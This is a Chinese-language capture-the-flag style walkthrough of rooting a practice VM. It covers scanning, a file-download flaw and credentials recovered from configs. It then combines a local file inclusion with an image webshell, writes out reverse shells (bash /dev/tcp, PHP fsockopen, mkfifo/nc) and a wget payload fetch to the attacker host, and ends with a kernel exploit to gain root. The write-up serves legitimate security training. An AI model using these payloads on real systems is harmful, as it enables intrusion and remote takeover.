india靶机渗透
1.渗透过程
扫描局域网
apr-scan --interface=eth0 192.168.0.1/24
找到IP地址
192.168.0.104
找ip开放的端口
nmap -v -A -oN /tmp/india.txt 192.168.0.104
扫描结果:
Nmap 7.70 scan initiated Sun Apr 19 14:38:31 2020 as: nmap -v -A -oN /tmp/122.txt 192.168.0.104
Nmap scan report for 192.168.0.104
Host is up (0.00043s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 fa:cf:a2:52:c4:fa:f5:75:a7:e2:bd:60:83:3e:7b:de (DSA)
| 2048 88:31:0c:78:98:80:ef:33:fa:26:22:ed:d0:9b:ba:f8 (RSA)
|_ 256 0e:5e:33:03:50:c9:1e:b3:e7:51:39:a4:4a:10:64:ca (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: --==[[IndiShell Lab]]==--
MAC Address: 00:0C:29:A1:E2:DF (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.002 days (since Sun Apr 19 14:35:37 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.43 ms 192.168.0.104
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Sun Apr 19 14:38:40 2020 -- 1 IP address (1 host up) scanned in 9.01 seconds
发现只有开放了两个端口:
22和80
去看看web:
发现只有一个登录框
先试试sql注入:
使用sqlmap:
sqlmap -u 192.168.0.104 --data="un=123&ps=123&login=let%27s+login" --level=3
结果:
all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF)
sql注入没有了
开始爆破目录:
输入一个没有文件的链接发现是
Apache/2.2.22 (Ubuntu)
的服务器,那么很有可能是php的代码爆破php的路径
使用工具:Buster
Buster.exe -u=http://192.168.0.104/ -d=php.txt -t=5
扫描结果(除去了状态码为400的):
200 OK-----http://192.168.0.104///add.php
200 OK-----http://192.168.0.104///index.php
200 OK-----http://192.168.0.104///head.php
200 OK-----http://192.168.0.104///show.php
200 OK-----http://192.168.0.104///test.php
200 OK-----http://192.168.0.104///c
200 OK-----http://192.168.0.104///index
200 OK-----http://192.168.0.104///panel
200 OK-----http://192.168.0.104///c.php
200 OK-----http://192.168.0.104///in.php
200 OK-----http://192.168.0.104///panel.php
403 Forbidden-----http://192.168.0.104///doc/
403 Forbidden-----http://192.168.0.104///cgi-bin/
403 Forbidden-----http://192.168.0.104///doc/demo/demo3.php
403 Forbidden-----http://192.168.0.104///doc/demo/demo5.php
403 Forbidden-----http://192.168.0.104///doc/demo/database_demo.php
403 Forbidden-----http://192.168.0.104///doc/demo/demo4.php
403 Forbidden-----http://192.168.0.104///doc/demo/demo7.php
403 Forbidden-----http://192.168.0.104///doc/demo/demo8.php
403 Forbidden-----http://192.168.0.104///doc/demo/hello_world_demo.php
403 Forbidden-----http://192.168.0.104///doc/demo/demo6.php
403 Forbidden-----http://192.168.0.104///doc/fix_depricated.php
403 Forbidden-----http://192.168.0.104///doc/reports/index.php
403 Forbidden-----http://192.168.0.104///doc/demo/demo9.php
403 Forbidden-----http://192.168.0.104///doc/rpm-build/header.inc.php
403 Forbidden-----http://192.168.0.104///doc/rpm-build/checkout-build-archives.php
403 Forbidden-----http://192.168.0.104///doc/rpm-build/post_install.php
逐个查看网页:发现一个test.php有这样一句话:
'file' parameter is empty. Please provide file path in 'file' parameter
说是缺少一个file参数,那随便试用一个文件
http://192.168.0.104///test.php?file=./test.php
发现没反应,那就试试post请求:
发现把自己下载下来了~!竟然可以随便下载文件
那就把刚刚扫描到的那些文件都下载下来
把phpinfo里面有用的配置文件也下载下来
发现c.php是数据库连接文件
mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");
in.php是phpinfo
找到数据库账号密码了,去找找数据库管理界面,网页是php+mysql的一般的管理工具是phpmyadmin
那会不会是改了名字呢?
去百度看看phpmyadmin常用别名
试试访问
http://192.168.0.104/phpmy
简写发现进去了
PHPMyadmin配置文件是
config.inc.php
或config.default.php
去把他的配置文件下载下来看看
发现了:
$cfg['Servers'][$i]['user'] = 'root'; $cfg['Servers'][$i]['password'] = 'roottoor';
登录之后发现转到了
http://192.168.0.104/panel.php
看看下载下来的panel.php
panel.php是一个操作用户的界面
查看代码
发现了一个文件包含漏洞
if(isset($_POST['continue']))
{
$dir=getcwd();
$choice=str_replace('./','',$_POST['load']);
if($choice==='add'){
include($dir.'/'.$choice.'.php');
die();
}
if($choice==='show'){
include($dir.'/'.$choice.'.php');
die();
}
else{
include($dir.'/'.$_POST['load']);
}
}当
$choice!='add' && $choice!='show'
的时候会包含传递的load文件($choice)我们先添加一个用户他可以上传头像的,阅读代码发现对只能上传图片,所以我们用图片马
$ip=@$_POST['ip'];
$port=@$_POST['port'];
@system("bash -i >& /dev/tcp/{$ip}/{$port} 0>&1");
反弹shell 带ip和port的参数
利用漏洞
找到图片码的位置
http://192.168.0.104/uploaded_images/shell.png
抓包改提交的参数
load=uploaded_images/shell.png&continue=continue&ip=192.168.0.108&port=1111
nc接受:
nc -lvp 1111
发现没反应
可能是包含之后提交的参数已经过了
换一个固定IP地址和端口的图片码
@system("bash -i >& /dev/tcp/192.168.0.108/6666 0>&1");
nc接受:
nc -lvp 6666
然后用的
set_time_limit(0);
$ip='192.168.0.108';
$port='2520';
$fp=@fsockopen($ip,$port,$errno,$errstr);
if(!$fp){ echo "error";}
else{
fputs($fp,"\nconnect success\n");
while (!feof($fp)) {
fputs($fp,"shell:");
$shell=fgets($fp);
$message=`$shell`;
fputs($fp,$message);
}
fclose($fp);
}反弹了一个
www-data
的shell而且这个shell几乎没有权限只能操作网站目录
只有uploaded_images目录可以写入文件
写了一个一句话木马就上传就开用菜刀连了
发现版本是
Ubuntu12.04
有一个CVE-2015-1328
然后还是没办法拿提权
菜刀的终端没办法执行exp(提权的程序)
最后使用菜刀的终端去反弹了一个shell
mkfifo /tmp/lcawx; nc 192.168.0.108 4444 0</tmp/lcawx | /bin/sh >/tmp/lcawx 2>&1; rm /tmp/lcawx
然后在反弹的shell里面执行了exp
成功拿下rootshell
2. 重要信息
a.数据库账号密码
user:billu passwd:b0x_billu dbname:ica_lab
user:root passwd:roottoor (root密码)
b.网页登录密码
user:biLLu passwd:hEx_it
wget http://192.168.0.108:1010/rt ./uploaded_images/r
bash -i >& /dev/tcp/192.168.0.108/1999 0>&1
mkfifo /tmp/lcawx; nc 192.168.0.108 4444 0</tmp/lcawx | /bin/sh >/tmp/lcawx 2>&1; rm /tmp/lcawx
3.总结
<input type="file" name="file" id="file"><input type="submit" name="submit" value="up">
if($_FILES["file"])
move_uploaded_file($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);